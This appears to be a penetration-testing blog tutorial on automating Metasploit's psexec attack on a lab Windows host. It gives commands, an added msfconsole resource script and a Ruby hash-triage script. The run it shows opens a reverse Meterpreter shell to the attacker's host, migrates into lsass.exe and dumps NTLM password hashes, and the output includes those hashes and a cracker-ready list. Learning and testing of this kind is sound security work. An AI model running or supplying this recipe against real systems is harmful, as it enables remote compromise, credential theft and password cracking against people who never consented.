Saturday, July 6, 2019

Automation with AutoRunScript - Meterpreter - Metasploitable

During a penetration test, you want to automate as much as possible so you can focus on the actions that actually require human interaction. To ease this task, Metasploit lets you specify what happens the moment a new Meterpreter session is opened, using the AUTORUNSCRIPT option.

How to do it...
First, we need to create a file with the commands we want to execute. In this example, we will migrate to the lsass.exe process and dump the Windows hashes:
root@kali:~# cat autoruncmds.rc
migrate -N lsass.exe
hashdump
Next, we will use the exploit/windows/smb/psexec exploit module to compromise the target and set AUTORUNSCRIPT to the commands we want to run as soon as we receive a new session:
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.216.10
RHOST => 192.168.216.10
msf exploit(psexec) > set SMBUSER Administrator
SMBUSER => Administrator
msf exploit(psexec) > set SMBPASS vagrant
SMBPASS => vagrant
msf exploit(psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.216.5
LHOST => 192.168.216.5
msf exploit(psexec) > set AUTORUNSCRIPT multi_console_command -r /root/autoruncmds.rc
AUTORUNSCRIPT => multi_console_command -r /root/autoruncmds.rc
msf exploit(psexec) >
By setting AUTORUNSCRIPT, we can automatically run scripts on session creation. In this example, we use the multi_console_command script, which lets us specify multiple Meterpreter commands to run: either -c followed by the commands, enclosed in double quotes and separated by commas, or, as in our example, -r followed by the path to a text file on the Metasploit host with one command per line. Now that we have everything ready, we just need to use the exploit command to launch the attack:
[*] Session ID 1 (192.168.216.5:4444 -> 192.168.216.10:49665) processing AutoRunScript 'multi_console_command -r /root/autoruncmds.rc'
[*] Running Command List ...
[*] Running command migrate -N lsass.exe
[*] Migrating from 576 to 456...
[*] Migration completed successfully.
[*] Running command hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa:::
artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4:::
ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859:::
...
meterpreter >
Awesome! Looking at the output, we were able to get a new session, migrate to the lsass.exe process, and dump the Windows hashes without any interaction. Before reusing this command list on a real engagement, note that psexec already hands us a SYSTEM-level session, which is all hashdump needs, so the migration into lsass.exe is not required for the dump itself. Injecting into LSASS is also the noisiest possible choice: it is blocked outright when LSA Protection (RunAsPPL) is enabled, and a failed injection can crash the process and force the host to reboot. If the goal is only to leave the short-lived psexec service process, a less sensitive, long-lived SYSTEM-owned process is a safer migration target.
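Putting the whole recipe together as one non-interactive run: the following msfconsole resource script is an added example and is not part of the original post. It assumes the same lab addresses and credentials as above, that /root/autoruncmds.rc already exists on the Metasploit host, and a placeholder file name of psexec_autorun.rc; run it with msfconsole -q -r psexec_autorun.rc.

```rc
# psexec_autorun.rc - added example, not from the original post.
# Every line is an msfconsole command, executed in order.
use exploit/windows/smb/psexec
# Newer Metasploit names this option RHOSTS; the recipe's version spells it RHOST.
set RHOSTS 192.168.216.10
set SMBUSER Administrator
set SMBPASS vagrant
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.216.5
set LPORT 4444
# Same command list as the recipe, read from a file on the Metasploit host.
# The inline form of the same script takes a comma-separated list instead,
# e.g.  multi_console_command -c "getuid,hashdump"
set AUTORUNSCRIPT multi_console_command -r /root/autoruncmds.rc
# -j runs the exploit as a background job and -z skips interacting with the
# new session; the AutoRunScript output is still printed as the session opens.
exploit -j -z
```

Because the exploit runs as a job, the console prompt comes back immediately; the session and its autorun output appear when the target calls back, and `sessions -i 1` attaches to it afterwards.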

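The hashdump lines are in pwdump format (user:RID:LM hash:NT hash:::), and the next step after an automated dump is usually to triage them rather than read them by eye. The Ruby script below (Ruby being Metasploit's own language) is an added example, not code from the original post or from Metasploit: it parses that output, reports accounts that share a password, accounts with an empty password, any real LM hashes still stored, and emits a cracker-ready list. The first four sample lines are the recipe's own output; the Guest and svc_backup lines are constructed to exercise the empty-password and password-reuse cases.

```ruby
# Added example: triage of Meterpreter hashdump output in pwdump format.
# Not part of the original post. Line format: user:RID:LM_hash:NT_hash:::

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee" # LM hash of "" (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0" # NT hash of "" (empty password)

# Constructed sample: four lines from the recipe plus two made-up accounts.
SAMPLE_HASHDUMP = <<~DUMP
  [*] Running command hashdump
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
  anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa:::
  artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4:::
  ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  svc_backup:1020:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
DUMP

Entry = Struct.new(:user, :rid, :lm, :nt)

# Parse hashdump output, skipping console chatter and malformed lines.
def parse_hashdump(text)
  text.each_line.each_with_object([]) do |line, entries|
    user, rid, lm, nt = line.strip.split(":")
    next unless nt && lm.match?(/\A\h{32}\z/) && nt.match?(/\A\h{32}\z/)
    entries << Entry.new(user, rid.to_i, lm.downcase, nt.downcase)
  end
end

# Accounts sharing an NT hash share a password: cracking one, or passing
# the hash once, unlocks all of them.
def shared_passwords(entries)
  entries.group_by(&:nt)
         .select { |_, es| es.size > 1 }
         .map { |nt, es| [nt, es.map(&:user)] }
         .to_h
end

def empty_password_accounts(entries)
  entries.select { |e| e.nt == EMPTY_NT }.map(&:user)
end

# True if any account still stores a real LM hash (weak; crackable in minutes).
def lm_hashes_present?(entries)
  entries.any? { |e| e.lm != EMPTY_LM }
end

# "user:NThash" lines for a cracker (john --format=NT, hashcat -m 1000 --username).
def ntlm_for_cracking(entries)
  entries.reject { |e| e.nt == EMPTY_NT }.map { |e| "#{e.user}:#{e.nt}" }
end

if __FILE__ == $PROGRAM_NAME
  entries = parse_hashdump(SAMPLE_HASHDUMP)
  puts "#{entries.size} accounts parsed"
  shared_passwords(entries).each { |nt, users| puts "shared password #{nt}: #{users.join(', ')}" }
  empty_password_accounts(entries).each { |u| puts "empty password: #{u}" }
  puts "LM hashes present: #{lm_hashes_present?(entries)}"
  puts ntlm_for_cracking(entries)
end
```

Feeding it a whole Meterpreter log rather than just the hash lines is fine: anything that is not user:RID:32-hex:32-hex is ignored, so the output of the AutoRunScript run above can be piped in unchanged.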

